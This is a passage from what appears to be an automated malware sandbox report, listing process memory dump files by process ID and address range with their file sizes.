                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/3204-462-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/3204-207-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/3204-397-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/3204-134-0x0000000002B30000-0x0000000002F2D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                        • memory/3204-131-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/3204-130-0x0000000003030000-0x000000000391B000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8.9MB

                                                                                                                                                                                                                        • memory/3348-6-0x0000000005620000-0x0000000005621000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-0-0x0000000000ED0000-0x000000000139D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                        • memory/3348-5-0x0000000005680000-0x0000000005681000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-8-0x00000000056A0000-0x00000000056A1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-13-0x0000000000ED0000-0x000000000139D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                        • memory/3348-7-0x0000000005630000-0x0000000005631000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-3-0x0000000005650000-0x0000000005651000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-4-0x0000000005640000-0x0000000005641000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/3348-2-0x0000000000ED0000-0x000000000139D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                        • memory/3348-1-0x0000000077206000-0x0000000077208000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/4024-51-0x00000000055F0000-0x0000000005600000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                        • memory/4024-49-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                        • memory/4024-182-0x0000000072BC0000-0x0000000073371000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                        • memory/4024-50-0x0000000072BC0000-0x0000000073371000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                        • memory/4024-184-0x00000000055F0000-0x0000000005600000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                        • memory/4060-225-0x0000000000400000-0x0000000000930000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                        • memory/4228-219-0x0000000076E90000-0x00000000770E2000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.3MB

                                                                                                                                                                                                                        • memory/4228-229-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                        • memory/4228-221-0x00007FF9E77A0000-0x00007FF9E79A9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                        • memory/4228-218-0x0000000003E80000-0x0000000004280000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                        • memory/4228-199-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                        • memory/4228-193-0x0000000000410000-0x0000000000419000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                        • memory/4228-204-0x00007FF9E77A0000-0x00007FF9E79A9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                        • memory/4312-85-0x0000000000400000-0x0000000000B1D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.1MB

                                                                                                                                                                                                                        • memory/4312-245-0x0000000000400000-0x0000000000B1D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.1MB

                                                                                                                                                                                                                        • memory/4312-188-0x0000000000400000-0x0000000000B1D000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.1MB

                                                                                                                                                                                                                        • memory/4312-78-0x0000000000D50000-0x0000000000E50000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                                        • memory/4312-79-0x0000000002830000-0x000000000289E000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          440KB

                                                                                                                                                                                                                        • memory/4312-186-0x0000000000D50000-0x0000000000E50000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                                        • memory/4360-179-0x0000000002710000-0x0000000002737000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          156KB

                                                                                                                                                                                                                        • memory/4360-180-0x0000000000400000-0x0000000000AF8000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.0MB

                                                                                                                                                                                                                        • memory/4360-731-0x0000000000400000-0x0000000000AF8000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.0MB

                                                                                                                                                                                                                        • memory/4360-249-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          972KB

                                                                                                                                                                                                                        • memory/4360-178-0x0000000000CA0000-0x0000000000DA0000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1024KB

                                                                                                                                                                                                                        • memory/4756-729-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/4884-183-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/4884-181-0x0000000002BE0000-0x0000000002FE1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.0MB

                                                                                                                                                                                                                        • memory/4884-464-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/4884-451-0x0000000000400000-0x0000000000EDB000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          10.9MB

                                                                                                                                                                                                                        • memory/5372-610-0x0000000010000000-0x00000000105E6000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.9MB